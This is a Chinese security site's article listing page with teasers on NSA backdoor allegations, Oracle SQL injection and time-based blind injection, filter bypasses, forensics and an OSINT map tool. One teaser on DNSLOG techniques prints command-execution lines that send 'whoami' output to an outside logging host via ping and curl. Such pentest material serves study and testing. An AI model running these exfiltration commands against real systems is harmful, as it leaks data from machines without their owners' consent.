dual - 第 2 | CN-SEC 中文网

安全新闻

美国APT预置后门——对NSA长期系统性操控密码体系的揭露

在网络安全领域，关于美国是否在基础 IT 产品中预置后门的传言一直存在着广泛的质疑和猜测。1999年8月，加拿大Cryptonym公司首席科学家安德鲁·费尔南德斯（Andrew Fernandes）发...

01月28日117 views评论

阅读全文

安全文章

SQL注入之Oracle

免责声明由于传播、利用本公众号"零漏安全"所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,公众号"零漏安全"及作者不为此承担任何责任,一旦造成后果请自行承担!如有侵权烦请告知,我...

12月14日19 views评论

阅读全文

安全新闻

美国NSA植入后门芯片再添新证据Cavium的CPU后门

Cavium是一家半导体制造商，于2018年被Marvell收购，据称在爱德华·斯诺登2013年泄露的文件中被认定为为美国情报部门提供后门的半导体供应商。毫无例外地，Marvell否认其或Cavium...

09月21日86 views评论

阅读全文

安全文章

SQL注入基础 oracle 延时注入

oracle 延时注入1简介DBMS_LOCK.SLEEP()函数可以让一个过程休眠很多秒，但使用该函数存在许多限制。首先，不能直接将该函数注入子查询中，因为Oracle不支持堆叠查询(stacked...

05月15日146 views评论

阅读全文

安全闲碎

170个网络技术领域专业术语解释

1. 自主访问控制(DAC:Discretionary Access Control)自主访问控制(DAC)是一个访问控制服务，其执行一个基于系统实体身份的安全政策和它们的授权来访问系统资源。2. 双...

04月09日82 views评论

阅读全文

安全文章

数据库注入提权总结（下）

点击蓝字关注我们接上一篇数据库注入提权总结时间盲注dbms_pipe.receive_message ()DBMS_LOCK.SLEEP()函数可以让一个过程休眠很多秒，但使用该函数存在许...

03月13日21 views评论

阅读全文

安全文章

浅谈SQL database的各种技巧(六)

前言不同于前面几篇，这篇主要是集中对抗Oracle数据库的getshell方法和一些sql注入的利用姿势 Oracle 基础权限解释系统权限管理 DBA:拥有全部特权，是系统最高权限，只有DBA...

03月12日33 views已关闭评论

阅读全文

安全文章

渗透测试-DNSLOG使用技巧

0x01 命令执行场景 Liunx/Unix/Mac OS系统:ping `whoami`.mydnslog.comcurl http://mydnslog.com/`whoami...

01月25日63 views评论

阅读全文

安全文章

干货 | Oracle注入和漏洞利用姿势总结

基础介绍Oracle Database，又名 Oracle RDBMS，或简称 Oracle。是甲骨文公司的一款关系数据库管理系统。它是在数据库领域一直处于领先地位的产品。可以说 Oracle 数据库...

01月16日256 views已关闭评论

阅读全文

安全文章

常规特殊字符被过滤的一种绕过技巧

今天来分享一个绕过过滤比如 ' " ( ) % 等字符的场景，测试环境为 PHP+Mysql假设场景php 代码通过 HTTP GET 参数 param1 接收用户输入的内容，然后...

12月19日22 views评论

阅读全文

应急响应

看不到的痕迹证据——近源攻击事件回溯

其他案例随笔声音知识电子取证是一门严谨的科学，鉴定人员必须善用工具而不过分依赖工具。当取证工具力不从心之时，切莫轻言放弃，鉴定人员更要冷静沉着，越是能够掌握物证的特性，越有可能突破重重取证难关，在错综...

10月13日39 views评论

阅读全文

信息情报

【情报工具】Dual Maps：结合谷歌地图、街景和虚拟地球的优势

全文预计阅读时间：3分钟前几天福韵君写的一篇地图工具文章《记录俄乌冲突的交互式地图——TimeMap》获得了粉丝朋友们的一致好评。今天，福韵君再为大家介绍一款超级好用的地图工具——Dual Maps。...

04月23日115 views评论

阅读全文

美国APT预置后门——对NSA长期系统性操控密码体系的揭露

SQL注入之Oracle

美国NSA植入后门芯片再添新证据Cavium的CPU后门

SQL注入基础 oracle 延时注入

170个网络技术领域专业术语解释

数据库注入提权总结（下）

浅谈SQL database的各种技巧(六)

渗透测试-DNSLOG使用技巧

干货 | Oracle注入和漏洞利用姿势总结

常规特殊字符被过滤的一种绕过技巧

看不到的痕迹证据——近源攻击事件回溯

【情报工具】Dual Maps：结合谷歌地图、街景和虚拟地球的优势

在线咨询

微信